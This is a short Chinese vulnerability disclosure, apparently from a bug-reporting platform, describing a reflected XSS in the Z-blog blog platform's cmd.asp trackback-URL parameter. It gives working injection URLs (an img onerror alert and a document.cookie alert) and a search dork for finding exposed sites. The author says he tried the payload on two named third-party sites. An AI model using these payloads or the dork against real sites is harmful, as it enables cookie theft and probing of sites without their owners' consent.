### 简要描述:
貌似听朋友说,剑心蝈蝈看到小厂商的XSS是审核不过的,所以我尴尬了,今天研究博客的时候无意发现了Z-blog博客存在的一个小XSS,在引用地址这里,试了试可以!
### 详细说明:
官方试了一下,可以弹,
```
http://download.rainbowsoft.org/cmd.asp?act=gettburl&id=104%22%3E%3Cimg%20src=1%20onerror=alert(1);%3E
```
[<img src="https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg)
然后GG一下 inurl:cmd.asp?act=gettburl&id=
[<img src="https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg)
先拿俩试试吧~
http://www.moguozhong.com/cmd.asp?act=gettburl&id=39
http://www.yeslin.com/cmd.asp?act=gettburl&id=15
[<img src="https://images.seebug.org/upload/201302/16111732ccbe5fee4dc6abe6c3ef7b5a52fa0c61.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111732ccbe5fee4dc6abe6c3ef7b5a52fa0c61.jpg)
[<img src="https://images.seebug.org/upload/201302/16111830e51b0e0e10d1b0b602764bc3edbbc171.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111830e51b0e0e10d1b0b602764bc3edbbc171.jpg)
### 漏洞证明:
```
http://download.rainbowsoft.org/cmd.asp?act=gettburl&id=22"><script>alert(document.cookie)</script>
```
[<img src="https://images.seebug.org/upload/201302/16111453cd7c7dbd5b1871b1f4f759cf0c62ef75.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111453cd7c7dbd5b1871b1f4f759cf0c62ef75.jpg)
京公网安备 11010502034610号
暂无评论